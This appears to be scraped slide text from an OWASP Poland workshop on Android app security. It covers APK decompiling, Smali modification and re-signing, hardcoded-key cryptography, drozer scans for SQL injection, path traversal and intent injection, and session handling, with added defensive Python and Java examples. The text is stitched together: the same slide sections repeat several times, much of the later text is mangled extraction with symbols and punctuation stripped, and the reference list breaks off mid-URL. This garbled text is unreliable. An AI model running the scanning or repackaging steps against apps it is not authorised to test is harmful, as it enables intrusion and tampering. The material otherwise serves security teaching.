JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool – open-source Java tool for reverse-engineering Android apps – transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar: java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
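The "Anatomy of an apk" and "Signing apk" slides above rest on one fact: an APK is a ZIP archive, so its members (AndroidManifest.xml, classes.dex, resources.arsc, lib/, META-INF/) can be listed with standard tooling, and the META-INF files are what a v1 (JAR) signature consists of. The following is an added example, not code from the workshop or from any of the tools it names; the APK it inspects is constructed in memory with placeholder contents.

```python
"""Inspect the anatomy of an APK and report whether it carries a v1 (JAR) signature.

Added example (not from the workshop slides). An APK is a ZIP archive, so the
standard library is enough to list its well-known members. The sample APK is
constructed in memory with placeholder contents; no real app is touched.
"""
import io
import zipfile

# Members every APK built for Android carries, and what each one is.
WELL_KNOWN = {
    "AndroidManifest.xml": "binary XML manifest (components, permissions, exported flags)",
    "classes.dex": "Dalvik bytecode (input for dex2jar / apktool)",
    "resources.arsc": "compiled resource table",
}


def describe_apk(apk_bytes: bytes) -> dict:
    """Return a summary: known members, dex files, native libs, v1 signature files."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        names = zf.namelist()
    summary = {
        "known": {n: WELL_KNOWN[n] for n in names if n in WELL_KNOWN},
        "dex_files": sorted(n for n in names if n.endswith(".dex")),
        "native_libs": sorted(n for n in names if n.startswith("lib/") and n.endswith(".so")),
        "signature_files": sorted(
            n for n in names
            if n.startswith("META-INF/") and n.upper().endswith((".RSA", ".DSA", ".EC", ".SF"))
        ),
    }
    # A v1 (JAR) signature needs MANIFEST.MF plus a .SF file and a signature block
    # (.RSA/.DSA/.EC). Presence is all this checks; validity needs apksigner.
    has_sf = any(n.upper().endswith(".SF") for n in summary["signature_files"])
    has_block = any(n.upper().endswith((".RSA", ".DSA", ".EC")) for n in summary["signature_files"])
    summary["v1_signed"] = "META-INF/MANIFEST.MF" in names and has_sf and has_block
    return summary


def build_sample_apk(signed: bool) -> bytes:
    """Construct a minimal APK-shaped ZIP with placeholder contents (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"<placeholder binary xml>")
        zf.writestr("classes.dex", b"dex\n035\0placeholder")
        zf.writestr("resources.arsc", b"\0placeholder")
        zf.writestr("lib/arm64-v8a/libnative.so", b"\x7fELF placeholder")
        if signed:
            # What signapk.jar adds: manifest digests, signature file, PKCS#7 block.
            zf.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n")
            zf.writestr("META-INF/CERT.SF", b"Signature-Version: 1.0\n")
            zf.writestr("META-INF/CERT.RSA", b"placeholder PKCS#7 block")
    return buf.getvalue()


if __name__ == "__main__":
    for signed in (False, True):
        print("signed" if signed else "unsigned", describe_apk(build_sample_apk(signed)))
```

Two practical notes. The check above only tells you whether signature files are present; to verify them, and to see which certificate signed a build, use `apksigner verify --print-certs app.apk` from the Android SDK build tools. And an APK re-signed with signapk.jar after a Smali modification carries a different signing certificate than the original publisher's, so Android treats it as a different publisher: it will not install over the original app, and a signature comparison against the store build is the quickest way to spot a repackaged sample.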
Demo Time
Demo: Decompiling with Luyten
Demo: Modifying Smali files
Demo
Broken Cryptography - example
• Encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding passwords to decrypt it in code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on a device; use password-based encryption instead
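The two slides above put the hardcoded-password anti-pattern beside the recommended fix, password-based encryption. The following added example (not from the workshop and not NQ Vault's code) shows the difference in the one place that matters: where the database key comes from. It uses only the Python standard library (PBKDF2-HMAC-SHA256 for key derivation, HMAC for a key-check value); the password string and iteration count are constructed placeholders, and encrypting the database itself is out of scope.

```python
"""Hardcoded decryption key versus password-based key derivation.

Added example (not from the workshop slides). Standard library only: PBKDF2-HMAC-SHA256
derives the key, HMAC provides a key-check value. The point is where the key comes
from and what is allowed to sit on the device, not the database encryption itself.
"""
import hashlib
import hmac
import os
from typing import Optional

# --- The pattern the slides warn about: the secret is in the code, so anyone who
# runs the APK through dex2jar + JD-GUI/Luyten reads it straight off the screen.
HARDCODED_DB_PASSWORD = "s3cr3t-db-pass"   # constructed placeholder


def weak_db_key() -> bytes:
    """Every install shares this key, and it ships inside classes.dex."""
    return hashlib.sha256(HARDCODED_DB_PASSWORD.encode()).digest()


# --- Password-based encryption: nothing secret is stored on the device.
PBKDF2_ITERATIONS = 600_000   # placeholder work factor; tune to the target devices
KEY_LEN = 32


def derive_db_key(password: str, salt: bytes) -> bytes:
    """Derive the DB key from the user's password at run time; it is never written to disk."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS, KEY_LEN)


def enroll(password: str) -> dict:
    """Create the per-install public parameters: a random salt and a key-check value.

    The key-check value lets the app distinguish a wrong password from a corrupt
    database without storing either the key or the password.
    """
    salt = os.urandom(16)
    key = derive_db_key(password, salt)
    check = hmac.new(key, b"key-check", "sha256").digest()
    return {"salt": salt, "key_check": check}   # safe to store: contains no secret


def unlock(password: str, params: dict) -> Optional[bytes]:
    """Return the DB key if the password is right, else None."""
    key = derive_db_key(password, params["salt"])
    expected = hmac.new(key, b"key-check", "sha256").digest()
    return key if hmac.compare_digest(expected, params["key_check"]) else None


if __name__ == "__main__":
    params = enroll("correct horse battery staple")   # constructed sample password
    print("unlock ok:", unlock("correct horse battery staple", params) is not None)
    print("wrong password:", unlock("guess", params))
```

The contrast with the decompiling slides is the whole point: after `weak_db_key` is compiled, the string constant survives in the dex file and a decompiler shows it verbatim, whereas after `enroll` the device holds only a salt and a key-check value, which are useless without the user's password. A wrong password fails at `unlock` in constant time rather than by producing garbage plaintext.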
M7 - Client side injection
Client side injection – what it is
• Simple-words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from: – other application via intent/content provider – shared file – server response – third-party website
Client side injection – what to inject
• SQL injection to local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• Android application can talk (inter-process communication) to any other component (e.g. other application, system service, running new activity, etc.) via special objects called Intents
Intent view = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
Intent capture = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections: dz> run scanner.provider.injection -a <package_name>
• Data path traversal: dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (built-in application, Samsung KNOX – a security feature to separate personal and professional activities)
• Crafted URI with "smdm" prefix allows for remote installation of ANY application while a user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using Intent-filter. Even if the Activity has the attribute "exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
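The drozer commands in "how to find" and the intent-filter advice in the mitigations both come down to one manifest question: which components does the app expose to other apps, and which of those require no permission? The checker below is an added example, not workshop or drozer code. It applies the platform's own rule for activities, services and receivers (exported when android:exported="true", or when the attribute is absent and the component declares an intent-filter). The manifest is a constructed sample with placeholder package, class and scheme names; its UpdateActivity mirrors the shape of the UniversalMDMClient case, a VIEW filter on a custom URI scheme.

```python
"""Flag components an AndroidManifest.xml exposes to other apps.

Added example (not from the workshop slides or from drozer). Rule applied for
activities, services and receivers: exported when android:exported="true", or
when the attribute is absent and an <intent-filter> is declared. Exported
components with no android:permission are reachable from any app. The manifest
is a constructed sample; names and the "demo" scheme are placeholders.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver")

SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.demo">
  <application>
    <!-- Launcher activity: exported by its intent-filter, which is expected. -->
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <!-- Internal screen that declares a VIEW filter on a custom scheme: implicitly exported. -->
    <activity android:name=".UpdateActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <data android:scheme="demo"/>
      </intent-filter>
    </activity>
    <!-- Explicitly exported service, but protected by a permission. -->
    <service android:name=".SyncService" android:exported="true"
             android:permission="com.example.demo.permission.SYNC"/>
    <!-- Explicitly private: the filter does not make it reachable from other apps. -->
    <receiver android:name=".InternalReceiver" android:exported="false">
      <intent-filter><action android:name="com.example.demo.PING"/></intent-filter>
    </receiver>
  </application>
</manifest>
"""


def attr(el, name):
    """Read an attribute from the android: namespace."""
    return el.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(el) -> bool:
    explicit = attr(el, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    return el.find("intent-filter") is not None


def exported_components(manifest_xml: str) -> list:
    """Return [(tag, name, permission_or_None)] for every exported component, in document order."""
    root = ET.fromstring(manifest_xml)
    out = []
    for el in root.iter():
        if el.tag in COMPONENT_TAGS and is_exported(el):
            out.append((el.tag, attr(el, "name"), attr(el, "permission")))
    return out


def unprotected_exports(manifest_xml: str) -> list:
    """Exported components any app can reach: no android:permission required."""
    return [c for c in exported_components(manifest_xml) if c[2] is None]


if __name__ == "__main__":
    for tag, name, perm in exported_components(SAMPLE_MANIFEST):
        print(f"{tag:9} {name:20} permission={perm}")
```

On a real APK the manifest is binary XML, so decode it with apktool first (the slides' `apktool` step) and point the checker at the decoded file. Two caveats for the result list: a launcher activity is supposed to be exported, so the finding to act on is an exported, unprotected component that was meant to be internal (`.UpdateActivity` here), and since Android 12 (API 31) the platform refuses to install an app that declares an intent-filter without an explicit android:exported value, which removes the implicit case for new builds but not for apps targeting older SDKs.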
M9 - Improper session handling
Improper session handling – what it is
• Simple-words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and verify if:
  – a session expires (copy a cookie and try to use it after 30 minutes)
  – a session is destroyed after the authentication state changes (e.g. switching from any logged-in user to another logged-in user)
  – you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling - mitigations
• Invalidate session on the server side
• Set session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
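The four mitigations above, and the three proxy checks from "how to find", map onto a small server-side session store. The following is an added example, not code from the workshop: tokens come from the OS CSPRNG rather than a device ID, a session dies on absolute or idle expiry, a change of authentication state destroys the old token, and unused tokens are purged. Time is passed in as a parameter so the 30-minute check can be exercised deterministically; the lifetimes are constructed placeholders to be tuned per application.

```python
"""Server-side session handling that follows the M9 mitigations.

Added example (not from the workshop slides): an in-memory store with high-entropy
tokens, absolute and idle expiry, invalidation on authentication state changes and
cleanup of unused tokens. Time is injected for deterministic tests; the lifetimes
are constructed placeholders.
"""
import hashlib
import secrets
from dataclasses import dataclass
from typing import Optional

ABSOLUTE_LIFETIME = 8 * 3600   # seconds: hard cap regardless of activity
IDLE_TIMEOUT = 30 * 60         # seconds: the "try the cookie after 30 minutes" check


@dataclass
class Session:
    user: str
    created: float
    last_seen: float


class SessionStore:
    def __init__(self) -> None:
        # Keyed by SHA-256 of the token: a leaked store dump yields no usable tokens.
        self._sessions: dict = {}

    @staticmethod
    def _key(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def _expired(self, s: Session, now: float) -> bool:
        return now - s.created > ABSOLUTE_LIFETIME or now - s.last_seen > IDLE_TIMEOUT

    def login(self, user: str, now: float) -> str:
        """Issue a fresh 256-bit token from the OS CSPRNG; device IDs are never used."""
        token = secrets.token_urlsafe(32)
        self._sessions[self._key(token)] = Session(user, now, now)
        return token

    def validate(self, token: str, now: float) -> Optional[str]:
        """Return the user for a live token, or None; an expired token is destroyed on sight."""
        k = self._key(token)
        s = self._sessions.get(k)
        if s is None:
            return None
        if self._expired(s, now):
            del self._sessions[k]
            return None
        s.last_seen = now
        return s.user

    def logout(self, token: str) -> None:
        """Invalidate on the server side; the client forgetting its cookie is not enough."""
        self._sessions.pop(self._key(token), None)

    def switch_user(self, old_token: str, new_user: str, now: float) -> str:
        """Authentication state changed: destroy the old session and issue a new token."""
        self.logout(old_token)
        return self.login(new_user, now)

    def purge(self, now: float) -> int:
        """Destroy all unused (expired) tokens; returns how many were removed."""
        dead = [k for k, s in self._sessions.items() if self._expired(s, now)]
        for k in dead:
            del self._sessions[k]
        return len(dead)

    def active_count(self) -> int:
        return len(self._sessions)


if __name__ == "__main__":
    store = SessionStore()
    t = store.login("alice", 0.0)
    print("after 1 min:", store.validate(t, 60.0))
    print("after 31 idle min:", store.validate(t, 60.0 + IDLE_TIMEOUT + 1))
```

Each proxy check from the slides has a counterpart here: replaying a cookie after 30 minutes fails because `validate` enforces `IDLE_TIMEOUT`; switching accounts goes through `switch_user`, so the previous token is dead before the new one exists; and guessing another session is a matter of 256 random bits, not of knowing a device identifier. The average mobile session from the study quoted above is far shorter than either lifetime, which is the argument for keeping the idle timeout tight rather than generous.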
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Client side injection – what it is
• Simple words definition: malicious code can be provided as an input and executed by the application (on the client side).
• The malicious code can come from:
  – another application (via an Intent or a content provider)
  – a shared file
  – a server response
  – a third-party website
Client side injection – what to inject
• SQL injection into the local DB
• XSS / WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents:
  // implicit Intent: any app that handles ACTION_VIEW for this URI may be offered to the user
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  // implicit Intent: asks the system for any camera application
  Intent j = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application while the user thinks he is installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection – mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute "exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
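As an added example (not from the workshop slides), an Activity that treats the URI delivered by an Intent as untrusted input and hands it on to an internal component with an explicit Intent, next to the implicit form the mitigations warn about. UpdateActivity, InternalInstallerActivity, the action string and the host updates.example.com are hypothetical names.

```java
// Added example, not code from the workshop: the class names, action string and
// host below are hypothetical.
package com.example.hardened;

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;

public class UpdateActivity extends Activity {
    private static final String TAG = "UpdateActivity";
    // Allow-list for the only origin updates may come from (hypothetical).
    private static final String EXPECTED_SCHEME = "https";
    private static final String EXPECTED_HOST = "updates.example.com";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent incoming = getIntent();
        Uri target = incoming != null ? incoming.getData() : null;
        if (!isTrustedUpdateUri(target)) {
            // Anything that is not exactly what we expect is dropped; there is
            // no fallback to "install whatever the URI points at".
            Log.w(TAG, "rejected update URI supplied by the caller");
            finish();
            return;
        }
        startInternalInstaller(target);
    }

    // The URI carried by an Intent is attacker controlled whenever the Activity
    // can be reached by another app, so every part of it is checked.
    static boolean isTrustedUpdateUri(Uri uri) {
        if (uri == null || !uri.isHierarchical()) return false;
        if (!EXPECTED_SCHEME.equalsIgnoreCase(uri.getScheme())) return false;
        if (!EXPECTED_HOST.equalsIgnoreCase(uri.getHost())) return false;
        if (uri.getUserInfo() != null) return false;          // no user@host tricks
        String path = uri.getPath();
        if (path == null || path.contains("..")) return false; // no traversal
        return path.startsWith("/updates/") && path.endsWith(".apk");
    }

    // Internal communication via an explicit Intent: the target is named by
    // class, so no other application's intent-filter can claim it. Manifest
    // (hypothetical): the internal component has no intent-filter and is not
    // exported, so the explicit Intent is the only way to reach it:
    //   <activity android:name=".InternalInstallerActivity" android:exported="false" />
    private void startInternalInstaller(Uri verified) {
        Intent explicit = new Intent(this, InternalInstallerActivity.class);
        explicit.setData(verified);
        startActivity(explicit);
    }

    // Contrast: an implicit Intent only names an action. The system resolves it
    // against every installed app's intent-filters, so a different app that
    // registers the same filter is offered in the chooser dialog.
    private void startImplicitInstaller(Uri verified) {
        Intent implicit = new Intent("com.example.ACTION_INSTALL_UPDATE");
        implicit.setData(verified);
        startActivity(implicit);
    }
}
```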
M9 – Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and verify if:
  – the session expires (copy a cookie and try to use it after 30 minutes)
  – the session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – you are able to guess any other session (e.g. it is easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"...
• ...but how long should a session REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts... 71.56 seconds
  http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling – mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
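The mitigation checklist above, as an added example that is not part of the original deck: a minimal server-side session store in plain Java (no framework) with SecureRandom tokens, idle and absolute expiry, server-side invalidation and token rotation when the authentication state changes. The 30-minute and 8-hour timeouts are illustrative, and the clock is injected so expiry can be exercised without waiting.

```java
// Added example, not code from the workshop. Timeouts and user names are
// illustrative; the clock is injected so expiry can be driven by hand.
import java.security.SecureRandom;
import java.util.Base64;
import java.util.Map;
import java.util.Optional;
import java.util.concurrent.ConcurrentHashMap;
import java.util.function.LongSupplier;

public final class SessionStore {
    private static final int TOKEN_BYTES = 32;   // 256 bits from a CSPRNG

    public static final class Session {
        private final String userId;
        private final long createdAt;
        private volatile long lastSeenAt;

        Session(String userId, long now) {
            this.userId = userId;
            this.createdAt = now;
            this.lastSeenAt = now;
        }

        public String userId() { return userId; }
    }

    private final SecureRandom random = new SecureRandom();
    private final Map<String, Session> sessions = new ConcurrentHashMap<>();
    private final long idleTimeoutMs;      // "copy a cookie and try it after 30 minutes"
    private final long absoluteTimeoutMs;  // hard cap regardless of activity
    private final LongSupplier clock;      // current time in ms, injected

    public SessionStore(long idleTimeoutMs, long absoluteTimeoutMs, LongSupplier clock) {
        this.idleTimeoutMs = idleTimeoutMs;
        this.absoluteTimeoutMs = absoluteTimeoutMs;
        this.clock = clock;
    }

    // Token generation: random bytes, URL-safe Base64. Never derive the token
    // from a device ID or anything else another party can read or predict.
    private String newToken() {
        byte[] buf = new byte[TOKEN_BYTES];
        random.nextBytes(buf);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(buf);
    }

    public String login(String userId) {
        String token = newToken();
        sessions.put(token, new Session(userId, clock.getAsLong()));
        return token;
    }

    // Server-side validation on every request; an expired token is removed so
    // a copied cookie cannot be replayed later.
    public Optional<Session> resolve(String token) {
        if (token == null) return Optional.empty();
        Session s = sessions.get(token);
        if (s == null) return Optional.empty();
        long now = clock.getAsLong();
        if (now - s.lastSeenAt > idleTimeoutMs || now - s.createdAt > absoluteTimeoutMs) {
            sessions.remove(token);
            return Optional.empty();
        }
        s.lastSeenAt = now;
        return Optional.of(s);
    }

    // Authentication state change (switching to another user, step-up auth):
    // destroy the old token and issue a fresh one, so nothing captured before
    // the change stays valid afterwards.
    public String rotate(String oldToken, String newUserId) {
        sessions.remove(oldToken);
        return login(newUserId);
    }

    // Logout invalidates on the server, not only in the client.
    public boolean logout(String token) {
        return sessions.remove(token) != null;
    }

    // "Destroy all unused session tokens": drop every other session of a user.
    public int logoutOthers(String userId, String keepToken) {
        int removed = 0;
        for (Map.Entry<String, Session> e : sessions.entrySet()) {
            if (e.getValue().userId.equals(userId) && !e.getKey().equals(keepToken)
                    && sessions.remove(e.getKey()) != null) {
                removed++;
            }
        }
        return removed;
    }

    public static void main(String[] args) {
        long[] now = { 0L };
        SessionStore store = new SessionStore(30 * 60_000L, 8 * 3_600_000L, () -> now[0]);
        String alice = store.login("alice");
        System.out.println("fresh token valid: " + store.resolve(alice).isPresent());
        now[0] += 31 * 60_000L;   // simulate 31 minutes of inactivity
        System.out.println("token valid after 31 min idle: " + store.resolve(alice).isPresent());
        String bob = store.rotate(store.login("alice"), "bob");
        System.out.println("rotated token belongs to: "
                + store.resolve(bob).map(Session::userId).orElse("nobody"));
    }
}
```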
Thank you
pawel.rzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
(diagram) DEX → JAR → JAVA
Decompiling – Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows the use of any existing Java decompiler on the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed source Java decompiler
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
(diagram) DEX → SMALI
Disassembling
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali Files
Demo
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
